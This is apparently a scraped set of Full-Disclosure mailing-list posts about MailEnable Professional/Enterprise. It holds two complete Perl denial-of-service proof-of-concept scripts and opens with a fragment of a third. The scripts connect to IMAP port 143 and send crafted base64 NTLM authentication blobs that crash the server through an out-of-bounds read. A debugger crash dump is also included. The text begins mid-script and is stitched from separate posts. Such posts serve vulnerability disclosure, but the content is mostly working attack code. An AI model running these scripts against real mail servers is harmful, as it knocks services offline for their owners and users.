die(Error: $!\n); $paddr = sockaddr_in($port, $iaddr) || die(Error: $!\n); $proto = getprotobyname('tcp') || die(Error: $!\n); socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die(Error: $!\n); connect(SOCKET, $paddr) || die(Error: $!\n); return(1338); } #!/usr/bin/perl # # maildisable-v6.pl # # Mail Enable Professional =v2.35 (win32) remote exploit # by mu-b - Tue Dec 5 2006 # # - Tested on: Mail Enable Professional v2.35 (win32) # # Note: timing
[Full-disclosure] MailEnable DoS POC
The POC attached exploits an out of bounds memory read in the NTLM authentication routines of MailEnable Pro/Enterprise. The problem lies in the NTLM_UnPack_Type3 function of MENTLM.dll. This appears to have been silently patched somewhere between versions 2.351 and 2.36-7. (observe the quotes). (c34.dc0): Access violation - code c005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=8146930b ebx=003a6cc8 ecx=0040 edx= esi=8146920b edi=0146b238 eip=0109b4b3 esp=014691e4 ebp=014691ec iopl=0 nv up ei pl nz ac po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs= efl=00010212 MENTLM!NTLM_UnPack_Type3+0x3019: 0109b4b3 f3a5rep movs dword ptr es:[edi],dword ptr [esi] es:0023:0146b238= ds:0023:8146920b= --- ([EMAIL PROTECTED]) #!/usr/bin/perl # # maildisable-v5.pl # # Mail Enable Professional/Enterprise =v2.35 (win32) # by mu-b - Wed Nov 29 2006 # # - Tested on: Mail Enable Professional v2.32 (win32) - with HOTFIX # Mail Enable Professional v2.33 (win32) # Mail Enable Professional v2.34 (win32) # Mail Enable Professional v2.35 (win32) # # out of bounds read == DoS # use Getopt::Std; getopts('t:', \%arg); use Socket; use MIME::Base64; print_header; my $target; if (defined($arg{'t'})) { $target = $arg{'t'} } if (!(defined($target))) { usage; } my $imapd_port = 143; my $send_delay = 2; my $PAD = 'A'; if (connect_host($target, $imapd_port)) { print(- * Connected\n); send(SOCKET, 1 AUTHENTICATE NTLM\r\n, 0); sleep($send_delay); $buf = ($PAD x 12). \xfa\xff\xff\xff. ($PAD x 12); send(SOCKET, encode_base64($buf).\r\n, 0); sleep($send_delay); $buf = ($PAD x 28). \x00\x01. ($PAD x 2). \xef\xbe\xad\xde; send(SOCKET, encode_base64($buf).\r\n, 0); sleep($send_delay); print(- * Successfully sent payload!\n); } sub print_header { print(MailEnable Pro =v2.36 DoS POC\n); print(by: [EMAIL PROTECTED]\n\n); } sub usage { print(qq(Usage: $0 -t hostname -t hostname: hostname to test )); exit(1); } sub connect_host { ($target, $port) = @_; $iaddr = inet_aton($target) || die(Error: $!\n); $paddr = sockaddr_in($port, $iaddr) || die(Error: $!\n); $proto = getprotobyname('tcp') || die(Error: $!\n); socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die(Error: $!\n); connect(SOCKET, $paddr) || die(Error: $!\n); return(1338); } ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] MailEnable DoS POC-2
This version will work on the latest MailEnable v2.37.. Symantec seem to think this is the same issue as BID 20290, but it is in fact, completely different... and somewhat unpatched.. --- ([EMAIL PROTECTED]) #!/usr/bin/perl # # maildisable-v7.pl # # Mail Enable Professional/Enterprise v2.32-7 (win32) # by mu-b - Wed Feb 14 2007 # # - Tested on: Mail Enable Professional v2.37 (win32) # use Getopt::Std; getopts('t:', \%arg); use Socket; use MIME::Base64; print_header; my $target; if (defined($arg{'t'})) { $target = $arg{'t'} } if (!(defined($target))) { usage; } my $imapd_port = 143; my $send_delay = 2; my $PAD = 'A'; if (connect_host($target, $imapd_port)) { print(- * Connected\n); send(SOCKET, 1 AUTHENTICATE NTLM\r\n, 0); sleep($send_delay); $buf = ($PAD x 12). \xfa\xff\xff\xff. ($PAD x 12); send(SOCKET, encode_base64($buf).\r\n, 0); sleep($send_delay); $buf = ($PAD x 28). \x00\x01. ($PAD x 2). \xff\xff\xff\x7f; send(SOCKET, encode_base64($buf).\r\n, 0); sleep($send_delay); print(- * Successfully sent payload!\n); } sub print_header { print(MailEnable Pro v2.37 DoS POC\n); print(by: [EMAIL PROTECTED]\n\n); } sub usage { print(qq(Usage: $0 -t hostname -t hostname: hostname to test )); exit(1); } sub connect_host { ($target, $port) = @_; $iaddr = inet_aton($target) || die(Error: $!\n); $paddr = sockaddr_in($port, $iaddr) || die(Error: $!\n); $proto = getprotobyname('tcp') || die(Error: $!\n); socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die(Error: $!\n); connect(SOCKET, $paddr) || die(Error: $!\n); return(1338); } ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/